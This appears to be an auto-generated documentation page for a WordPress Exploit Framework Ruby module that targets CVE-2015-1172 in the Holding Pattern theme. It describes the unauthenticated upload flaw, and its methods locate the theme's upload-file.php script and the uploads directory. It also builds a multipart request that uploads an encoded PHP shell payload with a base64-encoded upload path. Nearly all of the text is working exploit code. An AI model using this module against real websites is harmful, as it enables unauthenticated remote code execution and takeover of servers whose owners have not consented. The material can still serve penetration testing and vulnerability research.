class Wpxf::Exploit::HoldingPatternShellUpload

Public Class Methods

new() click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 8
def initialize
  super

  update_info(
    name: 'Holding Pattern Theme Shell Upload',
    desc: 'This module exploits a file upload vulnerability in all versions '\
          'of the Holding Pattern theme found in the upload_file.php script '\
          'which contains no session or file validation. It allows '\
          'unauthenticated users to upload files of any type and '\
          'subsequently execute PHP scripts in the context of the '\
          'web server.',
    author: [
      'Alexander Borg', # Vulnerability disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['CVE', '2015-1172'],
      ['WPVDB', '7784']
    ],
    date: 'Feb 11 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 31
def check
  check_theme_version_from_readme('holding_pattern')
end
payload_body_builder(payload_name) click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 47
def payload_body_builder(payload_name)
  target_ip = IPSocket.getaddress(target_host)
  field_name = Utility::Text.md5(target_ip)

  builder = Utility::BodyBuilder.new
  builder.add_file_from_string(field_name, payload.encoded, payload_name)
  builder.add_field('upload_path', 'Li4vdXBsb2Fkcw==')
  builder
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 35
def plugin_url
  normalize_uri(wordpress_url_themes, 'holding_pattern')
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 43
def uploader_url
  normalize_uri(plugin_url, 'admin', 'upload-file.php')
end
uploads_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb, line 39
def uploads_url
  normalize_uri(plugin_url, 'uploads/')
end